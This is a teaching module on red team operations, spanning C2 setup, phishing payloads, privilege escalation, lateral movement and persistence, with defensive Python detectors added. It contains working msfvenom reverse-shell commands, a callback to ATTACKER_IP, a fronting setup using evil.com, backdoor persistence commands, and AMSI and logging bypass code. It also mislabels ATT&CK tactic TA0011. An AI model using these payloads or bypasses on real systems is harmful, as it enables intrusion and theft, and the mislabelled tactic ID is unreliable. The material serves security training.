
Week 11: Red Team Operations

MITRE ATT&CK: Tactic — TA0011 (Initial Access), TA0008 (Lateral Movement), TA0004 (Privilege Escalation)

Real-World Attack Scenario: The Carbanak Banking Trojan Campaign

Carbanak (2014-2020) stole $1 billion from 100+ financial institutions worldwide:

  1. Initial Access via Phishing: Sent malicious Excel attachments to bank employees
  2. Macro-based Payload: Used VBA macros to download second-stage malware
  3. C2 Infrastructure: Used pastebin-like sites for C2 communications
  4. Internal Recon: Once inside bank network, scanned for admin workstations
  5. Lateral Movement: Used PsExec and remote desktop to move between systems
  6. ATM Control: Accessed ATM management servers to control cash dispensing
  7. Coordinated Cashout: Triggered ATMs to dispense cash at specific times; accomplices collected

Red team techniques demonstrated:

| Phase | Technique |
|---|---|
| Initial Access | Phishing with macro-laced Excel |
| Execution | VBA macros, Windows Script Host |
| Persistence | Registry run keys, scheduled tasks |
| Defense Evasion | Disabling antivirus, code obfuscation |
| Discovery | Network scanning, admin workstation hunt |
| Lateral Movement | PsExec, RDP, scheduled tasks |
| Collection | ATM control, video surveillance capture |
| Exfiltration | Internal staging servers, DNS tunneling |

Why this week matters: Real attackers don't run nmap scans from the internet and call it done. Carbanak's operators spent months inside networks, carefully moving laterally, maintaining persistence, and coordinating cashout operations. Red team operations simulate this patient, adaptive adversary.

Objectives

  • Understand red team vs penetration testing methodology
  • Deploy C2 infrastructure (Covenant, Sliver, Metasploit)
  • Execute coordinated attack campaigns
  • Maintain persistence and avoid detection

Red Team vs Penetration Test

| Aspect | Pentest | Red Team |
|---|---|---|
| Scope | Often single target | Full network/environment |
| Goal | Find vulns | Achieve objectives (data, flags) |
| Detection | Avoided | Often allowed (be careful) |
| Timeframe | Days-weeks | Weeks-months |
| Phases | Standard | Phases + opsec + C2 |
| Social engineering | Limited | Heavy |

Command & Control (C2)

Infrastructure Setup

Attacker IP: 10.0.0.4 (Kali)

Components:
- Redirector (nginx/apache) - Domain fronting
- C2 server (Covenant/Sliver/Haven)
- Payload hosting
- Landing page

Domain Fronting (Hide C2)

```bash
# Use a legitimate CDN as the redirector
# Target sees: cloud provider IP
# Traffic goes to: your C2

# Common: Azure, Cloudflare
# Setup:
# 1. Register a domain: evil.com
# 2. Point it at an Azure blob endpoint
# 3. Configure the Covenant profile to use Azure as the redirector
# 4. Target calls https://evil.com (resolves to Azure)
# 5. Azure forwards to your C2
```

Sliver (Modern C2)

```bash
# Install (Kali package)
apt install sliver

# Start the server; the commands below run in its console
sliver-server

# Generate an implant
generate --http <your_ip> --profile my-profile

# Or generate a specific payload (beacon, saved to /tmp)
generate beacon --http <your_ip>:80 --save /tmp

# Once the implant runs on the target, the callback shows up in the Sliver console
sessions
```

Covenant (.NET C2)

```bash
# Install: Covenant is a .NET Core project that is cloned and run from source
# (it is not published as a dotnet global tool)
git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant

# Build and start
dotnet build
dotnet run

# Web UI: https://localhost:7443
# Generate a listener
# Generate a launcher
# Create a Grunt implant

# Profiles (for opsec)
# Edit in the Web UI
# Configure jitter, sleep, user-agent, etc.
```

Metasploit Framework

```bash
# Start
msfconsole

# Set up the listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 10.0.0.4
set LPORT 443
set HandlerSSLCert /path/to/cert.pem
run

# Generate the payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.4 LPORT=443 -f exe -o shell.exe

# Resource scripts for automation live in
# /usr/share/metasploit-framework/scripts/resource/
```

Phases of Attack

1. Initial Access

```bash
# Phishing with a macro
# Generate: msfvenom -p windows/meterpreter/reverse_https LHOST=IP LPORT=443 -f hta-psh -o shell.hta
# Host on the attacker server
# Send the link to the target

# Credential harvesting (evilginx, macro)
# Create a malicious Office doc
msfvenom -p windows/meterpreter/reverse_https LHOST=IP LPORT=443 -f doc -o invoice.doc

# Watering hole (compromise a site the targets already visit)
# Exploit a public-facing app (Week 6)

# Valid accounts (password spray)
# Spray common passwords across many accounts
python3 kerbrute.py -d DOMAIN --users users.txt --passwords passwords.txt
```

2. Initial Foothold

```bash
# After a shell is obtained:
# 1. Check privileges
getuid
getprivs
sysinfo

# 2. Enumerate quickly
# On Windows: hashdump, kiwi, network_scan
# On Linux: enum_configs, linpeas.sh

# 3. Move to better C2 if needed
# Port forward, SOCKS proxy
# Pivot into the internal network

# 4. Escalate (Week 9)
```

3. Privilege Escalation

```bash
# Linux: linpeas, sudo exploits, kernel
# Windows: potato variants, service exploits, kernel

# After getting SYSTEM:
# 1. Dump all hashes
hashdump
# or
run post/windows/gather/hashdump

# 2. Gather credentials
run post/windows/gather/credentials/credential_collector
# or Mimikatz
load kiwi
creds_all

# 3. Set persistence
run persistence -X -i 60 -p 443 -r ATTACKER_IP
```

4. Lateral Movement

```bash
# Pass credentials
python3 psexec.py DOMAIN/user:pass@TARGET cmd.exe

# Pass the hash
python3 wmiexec.py -hashes :HASH DOMAIN/user@TARGET

# Overpass the hash (use a ticket instead of the hash)
# Use Rubeus
.\Rubeus.exe asktgt /user:admin /rc4:HASH /domain:DOMAIN

# SSH tunneling (Week 7)
# RDP sessions
enumrdp
rdp
```

5. Data Collection

```bash
# Target categories:
# - Credentials (SAM, LSASS, DPAPI, Kerberos tickets)
# - Sensitive files (documents, databases)
# - Screenshots, keystrokes
# - Network traffic captures

# On Windows:
# Mimikatz for creds
# PowerSploit for files
# search_dns_domain or SharpHound for AD data

# Screenshots
screenshot

# Keylogging
keyscan_start
keyscan_dump
```

6. Persistence

```bash
# Windows: multiple options
# Registry (run keys)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "C:\temp\evil.exe"

# Scheduled task
schtasks /create /tn "Windows Update" /tr "C:\temp\evil.exe" /sc daily /st 09:00

# Service (create a new one, or repoint an existing one)
sc create "Windows Update" binPath= "C:\temp\evil.exe" start= auto
sc config upnphost binPath= "C:\temp\evil.exe"

# WMI event subscription (stealthier)
# Use SharpWMI or Persistence.ps1

# Linux:
# cron
(crontab -l 2>/dev/null; echo "@reboot /tmp/backdoor") | crontab -

# systemd service
# /etc/systemd/system/evil.service
```
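Every mechanism listed above leaves a record a defender can review: a new service (Security/System event 7045), a created task (4698), a registry value write (Sysmon event 13) or a crontab entry. The following is an added example, not part of the course material, that triages simplified records of those events (field names are reduced to source, name, command and registry target; the sample records are constructed to mirror the commands above). It flags autostart binaries in temp or user-writable paths, names that imitate Windows components, Run-key writes, ImagePath changes on existing services, and `@reboot` cron lines.

```python
import re
from dataclasses import dataclass


@dataclass
class AutostartEvent:
    source: str        # "win_7045" (service installed), "win_4698" (task created),
                       # "sysmon_13" (registry value set) or "linux_cron"
    name: str          # service / task / registry value name ("" for cron)
    command: str       # image path, task action, registry data or cron line
    target: str = ""   # registry key path, sysmon_13 only


# Locations a legitimate autostart binary rarely lives in (Windows and Linux).
SUSPICIOUS_PATH = re.compile(
    r"(?i)(\\temp\\|\\users\\[^\\]+\\appdata\\|\\programdata\\"
    r"|(?:^|\s)/(?:tmp|dev/shm|var/tmp)/)")
# Names chosen to blend in with the operating system.
MIMIC_NAMES = {"windows update", "windowsupdate", "microsoft update", "svchost"}
RUN_KEY = re.compile(r"(?i)\\CurrentVersion\\Run(Once)?\\")
SERVICE_IMAGE = re.compile(r"(?i)\\CurrentControlSet\\Services\\[^\\]+\\ImagePath$")


def review(ev):
    """Return the sorted list of reasons this autostart entry deserves a look."""
    reasons = []
    if SUSPICIOUS_PATH.search(ev.command):
        reasons.append("binary_in_temp_or_user_writable_path")
    if ev.name.strip().lower() in MIMIC_NAMES:
        reasons.append("name_mimics_windows_component")
    if ev.source == "sysmon_13" and RUN_KEY.search(ev.target):
        reasons.append("run_key_autostart_added")
    if ev.source == "sysmon_13" and SERVICE_IMAGE.search(ev.target):
        reasons.append("existing_service_imagepath_changed")
    if ev.source == "linux_cron" and ev.command.lstrip().startswith("@reboot"):
        reasons.append("cron_reboot_entry")
    return sorted(reasons)


# Constructed records mirroring the persistence commands in this section.
SAMPLE_EVENTS = [
    AutostartEvent("sysmon_13", "Update", r"C:\temp\evil.exe",
                   r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update"),
    AutostartEvent("win_4698", "Windows Update", r"C:\temp\evil.exe"),
    AutostartEvent("win_7045", "Windows Update", r"C:\temp\evil.exe"),
    AutostartEvent("sysmon_13", "ImagePath", r"C:\temp\evil.exe",
                   r"HKLM\SYSTEM\CurrentControlSet\Services\upnphost\ImagePath"),
    AutostartEvent("linux_cron", "", "@reboot /tmp/backdoor"),
    # benign entries for contrast
    AutostartEvent("win_7045", "BackupAgent", r"C:\Program Files\BackupAgent\agent.exe"),
    AutostartEvent("linux_cron", "", "0 3 * * * /usr/local/bin/backup.sh"),
]


def triage(events):
    """(source, name, reasons) for every event that raised at least one reason."""
    return [(ev.source, ev.name, review(ev)) for ev in events if review(ev)]


if __name__ == "__main__":
    for source, name, reasons in triage(SAMPLE_EVENTS):
        print(f"{source:10} {name or '(cron)':16} {', '.join(reasons)}")
```

The ImagePath rule is the one most worth keeping: a Run key or a new task is noisy on a busy fleet, but a Sysmon 13 write to an existing service's ImagePath outside of patching is rare and is exactly what `sc config upnphost binPath=` produces.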

Operational Security (OPSEC)

Avoiding Detection

1. Sleep/Jitter           - Randomize beacon interval
2. User-Agent matching    - Use target's real UA
3. Domain aging           - Use domains > 30 days old
4. SSL certificates       - Use legitimate-looking certs
5. Process spawning       - Don't spawn from obvious paths
6. Rename binaries        - Don't use "msfvenom.exe"
7. AMSI bypass            - Disable before running .NET
8. PowerShell restrictions - Bypass where needed
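Sleep and jitter (item 1) make a beacon harder to spot, but the operator-side trade-off is that the check-in cadence stays statistically regular: a 60-second sleep with 20 % jitter still produces intervals clustered tightly around 60 seconds. This added example (not from the course) shows the detection side of that trade-off. It parses constructed proxy log lines in an assumed `<time> <src> <dst> <uri>` layout, groups requests per source/destination pair, and flags pairs whose inter-request gaps have a low coefficient of variation (standard deviation over mean). The 0.35 cutoff and the eight-request minimum are assumptions to calibrate against real traffic.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def _make_lines(start, src, dst, uri, intervals_s):
    """Build constructed log lines: one request per interval after `start`."""
    lines, t = [], datetime.fromisoformat(start)
    for gap in intervals_s:
        t += timedelta(seconds=gap)
        lines.append(f"{t.isoformat()} {src} {dst} {uri}")
    return lines


# Constructed sample traffic (not real logs).
LOG_LINES = (
    # implant: 60 s sleep with roughly +/-20 % jitter, always the same URI
    _make_lines("2024-05-01T09:00:00", "10.0.1.20", "198.51.100.7", "/api/v1/status",
                [60, 52, 68, 58, 63, 49, 71, 60, 55, 66])
    # human browsing to one site: bursts of clicks separated by long pauses
    + _make_lines("2024-05-01T09:00:00", "10.0.1.31", "203.0.113.5", "/news",
                  [3, 40, 2, 600, 5, 90, 1, 300])
)


def parse_line(line):
    ts, src, dst, uri = line.split(" ", 3)
    return datetime.fromisoformat(ts), src, dst, uri


def intervals_by_pair(lines):
    """Map (src, dst) to the list of gaps in seconds between consecutive requests."""
    times = defaultdict(list)
    for line in lines:
        ts, src, dst, _ = parse_line(line)
        times[(src, dst)].append(ts)
    gaps = {}
    for pair, ts_list in times.items():
        ts_list.sort()
        gaps[pair] = [(b - a).total_seconds() for a, b in zip(ts_list, ts_list[1:])]
    return gaps


def find_beacons(lines, max_cv=0.35, min_requests=8):
    """Return {(src, dst): {"mean_s", "cv"}} for pairs whose gaps are too regular.

    The coefficient of variation stays small under the jitter an operator
    typically configures, while human traffic scatters over orders of magnitude.
    """
    hits = {}
    for pair, gaps in intervals_by_pair(lines).items():
        if len(gaps) + 1 < min_requests:
            continue  # too few requests to judge regularity
        mean = statistics.mean(gaps)
        cv = statistics.stdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            hits[pair] = {"mean_s": round(mean, 1), "cv": round(cv, 3)}
    return hits


if __name__ == "__main__":
    for (src, dst), stats in find_beacons(LOG_LINES).items():
        print(f"possible beacon {src} -> {dst}: mean {stats['mean_s']} s, cv {stats['cv']}")
```

Raising the jitter to 50 % or more pushes the coefficient of variation up and defeats this single-statistic check, which is why production beacon hunting also looks at constant request sizes, a fixed URI set and the total number of connections per day.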

Detection Avoidance Techniques

```powershell
# PowerShell script block logging bypass
# Bypass in Covenant or manually
$BlockLogging = @'
$settings = [ref].Assembly.GetType('System.Management.Automation.PSConfiguration').GetField('EnableScriptBlockLogging','NonPublic,Static')
$settings.SetValue($null,$false)
'@
iex $BlockLogging

# AMSI bypass (in-memory)
$a = [Ref].Assembly.GetTypes()
ForEach($b in $a) { if ($b.Name -like "*iDispatch") { $c = $b } }
$d = $c.GetFields([System.Reflection.BindingFlags]::Static -bor [System.Reflection.BindingFlags]::NonPublic)
ForEach($e in $d) { if ($e.Name -like "*smi*") { $e.SetValue($null,$false) } }
```

C2 Malleable Profiles

```text
# Malleable profile example (obfuscate traffic)
# The block below uses Cobalt Strike's Malleable C2 syntax; Covenant expresses
# the same idea as an HTTP profile edited in the Web UI
# Transform HTTP headers/URIs to look like normal browser traffic

# Example: make traffic look like Google
http-config {
    header "Host" "www.google.com";
    header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
    header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
    header "Accept-Language" "en-US,en;q=0.5";
    header "Connection" "keep-alive";
}
```
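Both the domain-fronting setup in the C2 infrastructure section and the profile above rely on the outer and inner layers of an HTTPS request telling different stories, and that gap is what a proxy with TLS inspection can measure. This added example (not part of the course) scores constructed flow records on three checks: the TLS SNI disagreeing with the Host header (fronting), a Host value that claims a well-known site while the packets go to an address outside that site's networks (the profile above), and a User-Agent that copies only the first half of a Chrome string, as the profile does. The `EXPECTED_NETS` table is an assumption standing in for a real passive-DNS baseline, and the IP ranges in it are illustrative.

```python
import ipaddress
from dataclasses import dataclass


@dataclass
class Flow:
    src: str
    dst_ip: str
    sni: str          # server_name from the TLS ClientHello (visible without decryption)
    host: str         # Host header of the request (needs TLS inspection at the proxy)
    user_agent: str


# Constructed baseline: networks each well-known Host value is expected to land in.
EXPECTED_NETS = {
    "www.google.com": [ipaddress.ip_network("142.250.0.0/15")],
    "cdn.example-provider.net": [ipaddress.ip_network("13.107.0.0/16")],
}

# A complete Chrome User-Agent, for contrast with the truncated one in the profile.
FULL_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
           "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36")

# Constructed flows (not real traffic): benign CDN, fronted CDN, profile-style, benign Google.
SAMPLE_FLOWS = [
    Flow("10.0.1.20", "13.107.4.5", "cdn.example-provider.net", "cdn.example-provider.net", FULL_UA),
    Flow("10.0.1.20", "13.107.4.5", "cdn.example-provider.net", "c2-placeholder.invalid", FULL_UA),
    Flow("10.0.1.21", "203.0.113.10", "www.google.com", "www.google.com",
         "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"),
    Flow("10.0.1.22", "142.250.72.4", "www.google.com", "www.google.com", FULL_UA),
]


def sni_host_mismatch(flow):
    """Fronting splits the CDN name in the SNI from the real Host inside TLS."""
    return flow.sni.lower() != flow.host.lower()


def host_outside_expected_nets(flow):
    """Host claims a known site but the destination is not in that site's networks."""
    nets = EXPECTED_NETS.get(flow.host.lower())
    if nets is None:
        return False  # no baseline for this host, do not guess
    addr = ipaddress.ip_address(flow.dst_ip)
    return not any(addr in net for net in nets)


def truncated_browser_user_agent(flow):
    """Copied profiles often keep the WebKit token but drop the engine/browser suffix."""
    ua = flow.user_agent
    return "AppleWebKit" in ua and "(KHTML, like Gecko)" not in ua


def score_flow(flow):
    checks = [
        ("sni_host_mismatch", sni_host_mismatch),
        ("host_not_at_expected_network", host_outside_expected_nets),
        ("truncated_browser_user_agent", truncated_browser_user_agent),
    ]
    return [name for name, fn in checks if fn(flow)]


def triage(flows):
    """Index -> reasons, for flows that tripped at least one check."""
    return {i: r for i, f in enumerate(flows) if (r := score_flow(f))}


if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_FLOWS).items():
        f = SAMPLE_FLOWS[i]
        print(f"{f.src} -> {f.dst_ip} (sni={f.sni}, host={f.host}): {', '.join(reasons)}")
```

The SNI/Host check only needs the proxy to see both layers; without TLS inspection the second and third checks fall back to JA3/JA4 fingerprinting of the client hello, where a .NET implant and a real Chrome still differ.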

Coordinated Operations

Multi-Host Attack

```bash
# Attack flow:
# 1. Phish a user on a workstation → get a user shell
# 2. Escalate to SYSTEM
# 3. Dump credentials → get domain admin creds
# 4. Pivot to the DC → dump NTDS
# 5. Golden ticket → persistent domain access
# 6. Exfil data

# Timeline example:
# Day 1: Recon, phishing preparation
# Day 2: Phishing campaign launched
# Day 3: First victim, initial foothold
# Day 4-5: Privilege escalation, lateral movement to a server
# Day 6-7: Domain admin obtained
# Day 8-9: Persistence, data collection
# Day 10: Report
```

Automation

```bash
# Use runcmds in the C2 for common tasks
# Create aliases for frequently used commands
# Write automation scripts that execute on multiple hosts

# Example: PowerShell script for AD enumeration
# Run on the compromised host, output to the C2
```

Reporting

Red Team Report Structure

1. Executive Summary
   - High-level findings
   - Business risk
   - Recommendations

2. Engagement Overview
   - Scope and objectives
   - Rules of engagement
   - Timeline

3. Attack Narrative
   - Initial access vector
   - Post-exploitation activities
   - Lateral movement path
   - Time-to-compromise analysis

4. Findings
   - Detailed finding per technique
   - Evidence and screenshots
   - MITRE ATT&CK mapping
   - Risk rating

5. Defensive Recommendations
   - Detection opportunities
   - Mitigation steps
   - Hardening guidance

Key Takeaways

  1. C2 infrastructure — plan before operation; redirects, profiles, domain fronting
  2. OPSEC — sleep, jitter, UA matching, process names matter
  3. Phases — methodical: access → foothold → escalate → lateral → persist → collect
  4. Persistence — multiple layers: reg keys, services, scheduled tasks, tickets
  5. OPSEC mistakes — kill switch, predictable C2, flagged IOCs

Next Week Preview

Week 12 wraps up with CTF Preparation & Certification — practice strategies, platform guides (HTB, THM, PG), and OSCP/CEH prep tips.
